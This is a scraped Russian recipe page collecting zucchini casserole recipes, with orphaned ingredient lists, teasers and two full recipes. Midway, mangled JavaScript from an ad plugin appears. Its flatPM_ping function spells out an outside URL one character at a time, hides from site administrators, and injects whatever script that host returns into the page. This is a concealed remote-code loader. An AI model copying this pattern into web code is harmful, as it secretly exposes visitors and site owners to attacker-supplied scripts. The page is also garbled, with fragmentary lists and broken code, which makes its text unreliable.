Кабачковая запеканка

Запеканка из кабачков

Мы собрали для вас самые удачные рецепты запеканок из кабачков с пошаговыми фотографиями и инструкциями. Хотите знать, как приготовить вкусную и полезную кабачковую запеканку? Знакомьтесь с рецептами наших кулинаров!

Похожие подборки рецептов

Упорядочить рецепты по .

Рецепты кабачковых запеканок

Ингредиенты

Лук репчатый – 1 шт.

Перец болгарский – 1 шт.

Сметана или кефир – 120 мл.

Ингредиенты

Куриная грудка – 400-450 г

Молодые кабачки – 2 шт.

Сметана – 1 ст. л.

Сыр полу-твердый – 50 г

Чеснок – 3 зубчика

Свежий укроп – 3 веточки

Растительное масло – 1 ст. л.

Соль, смесь молотых перцев – по вкусу.

Ингредиенты

Свиной фарш – 500 г

Мука пшеничная – 3 ст.л.

Подсолнечное масло – 100 мл

Репчатый лук – 1 шт.

Чёрный молотый перец – по вкусу

Твёрдый сыр – 100 г

Яйца куриные – 4 шт.

Ингредиенты

Картофель – 300 г

Лук репчатый – 1 шт.

Масло растительное – 2 ст.л.

Соль, специи – по вкусу

Зелень – по вкусу

Ингредиенты

Адыгейский сыр – 150 г

Кабачок – 1 шт. (средний)

Зелень (зеленый лук, петрушка) – 1 пучок (небольшой)

Соль, черный молотый перец – по вкусу

Растительное масло – для смазывания формы

Ингредиенты

Лук репчатый – 1 шт.

Яйцо куриное – 1 шт.

Сыр твердый – 100 г

Сухари панировочные – 1 ст.л.

Соль и перец – по вкусу

Помидоры черри – 2 шт.

Растительное масло – для смазывания форм

Ингредиенты

Фарш мясной – 100 г

Яйцо куриное – 2 шт.

Ингредиенты

Сыр Моцарелла – 125 г

Сыр Пармезан – 20 г

Мука цельнозерновая – 70 г

Яйца куриные – 2 шт.

Разрыхлитель – 1 ч.л.

Оливковое масло – 1 ч.л.

Базилик – 2 веточки

Лук репчатый – 0.5 шт.

Ингредиенты

Рис – 1/3 стакана

Лук репчатый – 1 шт.

Сыр твердый – 70 г

Масло оливковое – 1 ст.л.

Ингредиенты

Яйцо куриное – 2 шт.

Лук репчатый – 1 шт.

Сыр твердый – 100 г

Сыр Фета – 100 г

Йогурт греческий – 120 г

Пекарский порошок – 1,5 ч.л.

Паприка сладкая молотая – 0,5 ч.л.

Перец черный молотый – по вкусу

Растительное масло – 1 ст.л.

Ингредиенты

Кабачок – 1 шт. около 300 г

Мясной фарш – 300 г

Сметана – 100 мл

Сыр – от 50 до 100 г

Чеснок – по желанию

Растительное масло – для жарки и для формы

Соль и специи – по вкусу

Ингредиенты

Куриное филе – 300 г

Лук репчатый – 1 шт.

Шампиньоны – 2-3 шт.

Сыр твердый – 30 г

Масло растительное – 2 ст.л.

Петрушка – пару веточек

Перец ч.м. – по вкусу

Ингредиенты

Кабачки – 700-800 г

Крахмал кукурузный – 2 ч.л.

Мускатный орех – 0.25-0.5 ч.л. (по вкусу)

Черный молотый перец – по вкусу

Сливки 20-33% – 200 мл

Сливочное масло – 10 г

Сухари панировочные – 70 – 100 г (по вкусу)

Ингредиенты

Кабачок – 2-3 шт. (0,5 кг)

Сливки 20% – 50 мл

Масло сливочное – 20 г

Сыр твёрдый – 150 г

Яйцо куриное – 4 шт.

Перец – по вкусу

Помидоры черри – 6 шт.

Ингредиенты

Яйца куриные – 4 шт.

Молоко – 1 стакан

Мука пшеничная – 0,5 стакана

Брокколи – 150 г

Чеснок – 1-2 дольки

Молотый черный перец – по вкусу

Травы и специи – по вкусу (см. описание рецепта)

Ингредиенты

Картофель – 2 шт.

Кабачки молодые – 1 шт.

Яйца куриные – 1 шт.

Сметана – 1,5-2 ст.л.

Фарш свиной – 250 г

Чеснок – 2 зубчика

Растительное масло – 3-4 ст.л.

Зелень петрушки – по вкусу

Соль, перец – по вкусу

Ингредиенты

Лук репчатый – 1 шт.

Перец болгарский – 2 шт.

Петрушка корень – 1 шт.

Чеснок – 2 зубка

Масло растительное – 4 ст.л.

Для заливки:

Сливки 33 % – 400 мл

Перец чёрный – по вкусу

Соус томатный – 2 ст.л.

Ингредиенты

Кабачок (молодой) – 1 шт.

Фарш мясной – 500 г

Помидор – 150-200 г

Чеснок – 1-2 зубчика

Перец ч.м. – по вкусу

Укроп – несколько веточек

Ингредиенты

Томатный соус – 800 г

Сыр Моцарелла – 125 г

Сыр колбасный – 150 г

Сыр Пармезан – 4 ст.л.

Мякиш белого хлеба – 100 г

Базилик свежий – 1 веточка

Оливковое масло – 2 ст.л.

Ингредиенты

Кабачок (крупный) – 1 шт.

Помидор (крупный) – 1 шт.

Масло растительное – 1 ст.л.

Специи – по вкусу

Заливка:

Йогурт 3,5% – 250 г

Чеснок – 1 зубчик

Ингредиенты

Кабачок среднего размера – 1 шт.

Лук репчатый – 1 шт.

Чеснок зубчик – 1 шт.

Перец болгарский – 1 шт.

Помидор средний – 1 шт.

масло растительное – 1 ст.л.

Сыр пармезан ( или любой острый) – 50 г

Сливки 33% – 120 г

Устричный соус – 1 ч.л.

Сухие травы (тимьян , розмарин) – 0.5 ч.л.

Свежая зелень – для подачи

Ингредиенты

Перец болгарский – 1 шт.

Лук репчатый – 1 шт.

Сметана 20% – 100 г

Масло подсолнечное – 1 ст.л.

Ингредиенты

Цветная капуста – 300 г

Яйца куриные – 2 шт.

Перец – по вкусу

Ингредиенты

Сыр твердый – 150 г

Яйцо куриное – 2 шт.

Укроп зеленый – 10 г

Мята свежая – 10 г

Перец черный молотый – по вкусу

Масло растительное – для смазывания формы

Ингредиенты

Цветная капуста – 600 г

Масло растительное – 1-2 ст.л.

Сыр твердый – 130 г

Пряности – по вкусу

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};

Поделитесь подборкой рецептов с друзьями

АЙМКУК © 2007-2020 год. Все права защищены.
Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

Запеканки из кабачков – простые и вкусные рецепты с фото от наших кулинаров

Овощная запеканка с сыром

Овощная запеканка с сыром готовится достаточно просто. Овощи можно использовать .

Куриное филе, запеченное с овощами

Хочу предложить вашему вниманию простое, сытное блюдо – куриное филе, запеченное .

Запеканка с фаршем и овощами

Запеканка с фаршем и овощами – вкусное и сытное блюдо. Готовят ее и с курицей, и .

Рецепт запеканки из кабачков с фаршем

Если вы любите кабачки, значит рецепт этого сытного блюда вам придется по душе. .

Кабачки с фаршем и рисом в духовке

Кабачки, приготовленные с фаршем и рисом в духовке,- простое, но очень сытное и .

Кабачковый рулет

Кабачковый рулет с творожно-сырной начинкой – очень вкусная, красивая и .

Пицца кабачковая

Пицца кабачковая – это замечательное и очень вкусное блюдо-запеканка из .

Овощи в духовке, запеченные слоями

Овощи в духовке, запеченные слоями, – это яркое, красочное блюдо, благодаря .

Рецепт овощных котлет

Сегодня хочу познакомить Вас с рецептом овощных котлет. Такие котлетки можно .

Творожная запеканка с брокколи и кабачками в духовке

Творожная запеканка с брокколи и кабачками, приготовленная в духовке, может .

Запеканка из кабачков и куриного филе

В тысячный раз убеждаюсь, что кабачок – это универсальный продукт. Из него можно .

Овощная запеканка под яичной заливкой

Я люблю кабачки в любом виде. Немного пофантазировав, приготовила в духовке .

Куриная запеканка с овощами

Куриная запеканка с овощами, приготовленная в мультиварке, очень вкусное, сытное .

Кабачковое суфле

Наступила пора кабачков! Поэтому предлагаю вам очень вкусное, нежное и воздушное .

Куриное суфле с кабачком

Из кабачков можно приготовить множество интересных блюд, в том числе и куриное .

Запеканка из кабачков и помидоров с сыром

Люблю сезон овощей – это безграничное разнообразие вкусов и ароматов. Можно .

Запеканка из кабачков с творогом

Когда много кабачков, руки так и тянутся приготовить из них что-нибудь .

Кабачковая запеканка с сыром

Легкую кабачковую запеканку с сыром можно приготовить на ужин или на завтрак. .

Запеканка из кабачков с рисом

Предлагаю приготовить вкусную, полезную запеканку из кабачков с рисом. Блюдо .

Запеканка из кабачков с брынзой

Предлагаю вам отличный рецепт приготовления запеканки из кабачков с брынзой. .

Кабачковый торт с грибами

Если вы любите удивлять своих родных и близких вкусным обедом или ужином, тогда .

Кабачковый рулет с грибами

Думаю, вы по достоинством оцените этот кабачковый рулет с грибами. Вкусное .

Кабачки, запеченные с помидорами и сыром

Кабачки, запеченные с помидорами и сыром, – очень лёгкое, полезное блюдо. Из .

Торт-закуска “Осенняя”

Осень – прекрасная пора, богатая изобилием разных овощей! Именно в это время .

“Жульен” из кабачков с сыром и чесноком

Конец лета, начало осени – сезон свежих овощей. Кабачковый сезон. И как же .

Запеканка “Овощная радуга”

На дворе лето и много свежих овощей. Хочется побольше ярких красок. Приготовьте .

Испанская тортилья (tortilla) из кабачков

Испанская тортилья – это блюдо идеально подходящее для завтрака. Самая .

Если Вы не нашли, то что искали, в этом разделе.
Воспользуйтесь поиском по всему сайту.

Картофельно-кабачковая запеканка


В летнее время ни у кого нет желания стоять у плиты, ведь самое время вырваться на отдых, а не проводить прекрасные солнечные деньки в душной кухне. Именно поэтому овощные запеканки — идеальное решение. Картофельно-кабачковая запеканка — вариант вкусного и сытного овощного блюда, которое готовится всего за час. Нужно подготовить продукты, нарезать овощи, поместить в форму и залить яйцами — и через полчаса пребывания в духовке у Вас на столе аппетитное блюдо. В летний период есть свежие овощи, и этим нужно воспользоваться. Кстати, блюдо получается еще и очень экономным, все продукты стоят недорого и летом их можно приобрести в любом городе или селе. Кабачки, картофель и яйца — это основа запеканки, но можно добавить также сыр, майонез или сметану, немного любимых специй и любые овощи по сезону: капусту, брокколи, морковь, лук, баклажаны, помидоры.

Как приготовить картофельно-кабачковую запеканку

Ингредиенты для приготовления картофельно-кабачковой запеканки:

  • половина большого кабачка или один средний;
  • несколько картофелин;
  • 2 куриных яйца крупных по размеру;
  • соль по вкусу;
  • молотый душистый перец по вкусу.

Рецепт приготовления картофельно-кабачковой запеканки.

1. Для начала вымоем хорошо молодой картофель. Выложим его в ковш, зальем водой и поставим на огонь. Варить картофель будем в течение 20-25 минут. Готовность обязательно нужно проверить ножом. Можно также использовать не отварной картофель, а сырой, однако так значительно увеличится время приготовления в духовке. Но стоит учесть, что если кабачкам достаточно 15-20 минут в духовке, то запеканку с сырым картофелем нужно выдерживать 35-45 минут. Хотя, в принципе, стоит попробовать данное блюдо сделать этими двумя способами, так как вкус у запеканки будет различным.

Когда картофель будет готов, сольем горячую воду и добавим холодную. Таким образом, картофель быстрее остынет.

3. Кабачок вымоем, очистим тонко кожуру. Если у вас сильно молоденькие кабачки, то очищать их не нужно. Тем более, как говорят, именно в кожуре содержится больше всего витамин. Если у вас кабачок большой по размеру, тогда разрежьте его пополам вдоль.

После этого нарежем кабачок на ломтики средние по толщине.

4. Отварной картофель остудим, очистим и нарежем ломтиками.

5. Для того, чтобы запечь картофельно-кабачковую запеканку я использовала небольшую керамическую форму по размеру 12*16 сантиметров, поэтому мне потребовалось немного продуктов. Запекала я блюдо в духовке, но думаю, можно смело запечь такого рода запеканку на самой обычной сковороде на газовой или электрической плите. После этого подготовим форму для выпекания. Смажем ее сливочным маслом.

Выложим кабачки с картошкой в керамическую формочку, чередуя их. Таким образом, получится как бы гармошка. Затем добавим соль и душистый перец. К дуэту из кабачка и картошки подойдут тимьян, базилик, паприка, орегано, хмели-сунели.

6. Для того, чтобы запеканка не развалилась, ее обычно заливают яйцами или яичной смесью с добавлением молока (сметаны, майонеза).
Куриные яйца вобьем в стеклянную и глубокую миску. После чего взбиваем их хорошо венчиком, чтобы масса была воздушной.

7. Заливаем овощи яичной массой. Если заливки мало, тогда потребуется повторить предыдущий шаг. При желании овощи можно сверху смазать майонезом или присыпать сыром.

8. Отправляем запеканку в разогретую до 180°С духовку на 15-20 минут. Если готовите запеканку из сырого картофеля, то форму нужно накрыть крышкой или обернуть сверху фольгой, чтобы картофель равномерно пропекся.

Подавайте картофельно-кабачковую запеканку горячей. Сметана, майонез, аджика или же горчица – это список соусов, которые будут идеально сочетаться с запеканкой. Также готовую овощную запеканку можно притрусить зеленью: укропом, петрушкой или зеленым луком.

Картофельно кабачковая запеканка готова. Приятного аппетита!

Кабачковая запеканка в духовке с сыром — 3 простых и вкусных рецепта

Кабачки в своем составе содержат большое количество витаминов, которые полезны для организма человека. Также овощи малокалорийные продукты, а значит прекрасно подходят как диетическая пища. Овощи полезны не только людям, которые хотят похудеть, но и людям с многими заболеваниями. Конечно многие употребляют овощи сырыми в пищу, но я считаю, что лучше всего из них сделать прекрасное блюдо.

Сегодня хочу вам рассказать о трех вкусных запеканках из кабачков с сыром. Они вам должны понравиться, особенно если вы на диете или придерживаетесь правильного питания. Самое главное в таких запеканках выбрать правильные кабачки.

Кабачки для запеканки должны быть маленькие, с нежной кожурой и практически без семечек.

Простой рецепт кабачковой запеканки с сыром и зеленью

Для приготовления нам понадобится:

  • Кабачки молодые — 700 гр.
  • Поваренная соль — 10 гр.
  • Яйцо куриное — 3 шт.
  • Чеснок — 3 дольки (большие).
  • Черный перец молотый — щепотка.
  • Мука пшеничная — 75 гр.
  • Масло растительное — 30 мл.
  • Зелень — пучок.
  • Сыр твердый — 100 гр.

Приготовление:

Кабачки нужно хорошо вымыть и обрезать кончики с обеих сторон. Если на шкурке имеются повреждения, то нужно немного кабачки почистить. После чего его натираем на крупной терке.

Натертые кабачки посыпаем солью и перемешиваем, а затем накрываем пленкой пищевой и даем постоять минут 10-15, что бы они начали выделять сок.

Зелень промываем под проточной водой, даем немного полежать на салфетках и мелко шинкуем.

Берем глубокую миски и разбиваем в нее яйца, затем добавляем зелень и давим дольки чеснока.

Кабачки отжимаем и добавляем к яйцам, также всыпаем муку и перец, после чего хорошо все перемешиваем.

Разогреваем духовку до 180°С.

На противень выкладываем пергамент для выпекания и смазываем его слегка маслом. Затем выкладываем массу из кабачков на всю поверхность в равномерный слой, толщиной около 1 см.

Ставим противень в разогретую духовку на 25 минут, после чего достаем его и посыпаем равномерно тертым сыром. После того как посыпали тертым сыром, можно отправить в духовку еще на 5 минут и наша запеканка будет готова.

Такую запеканку можно подавать с кетчупом или приготовить чесночный соус из чеснока и майонеза. Кто придерживается диеты, то можно кушать и так это вкусное блюдо.

Запеканка из кабачков с ветчиной и зеленью под сырной шапкой

Ингредиенты для запеканки:

Наименование Количество
Кабачки молодые 300 грамм
Сыр твердый 100 грамм
Ветчина 150 грамм
Яйцо куриное 2 штуки
Молоко 0,2 литра
Зелень пучок
Разрыхлитель теста 10 грамм
Соль поваренная 0,5 чайной ложки
Перец черный молотый щепотка
Мука пшеничная 3,5 столовые ложки
Масло растительное 20 грамм

Приготовление:

Включаем духовку, что бы к моменту запекания она у нас была полностью прогрета.

Первым делом нам нужно всыпать разрыхлитель в муку, все хорошо перемешать, а затем просеять все через сито.

В просеянную муку с разрыхлителем нам нужно разбить яйца и начать вымешивать тесто.

Продолжаем вымешивать тесто, при этом вливая в него молоко и добавив соли.

Ветчину нам нужно нарезать мелкими кубиками, зелень мелко нашинковать, сыр натереть на крупной терке и также через крупную терку пропустить кабачки.

Сыр натирается в отдельную тарелку

Теперь нам нужно взять противень для выпекания и лучше всего здесь подойдет керамическая посуда, которую нужно смазать маслом.

Смешиваем 1/3 часть сыра, кабачки, ветчину, зелень и выкладываем все в смазанную посуду. Перед тем как выложить всю массу на противень не забываем поперчить и посолить. Сверху заливаем все жидким тестом, которое приготовили из яиц, молока и муки. По залитому тесту просыпаем оставшимся сыром, что бы он равномерно распределился по поверхности.

Ставим противень в духовку на 35-45 минут и выпекаем при температуре 200°С.

Видео рецепт приготовления кабачковой запеканки с помидорами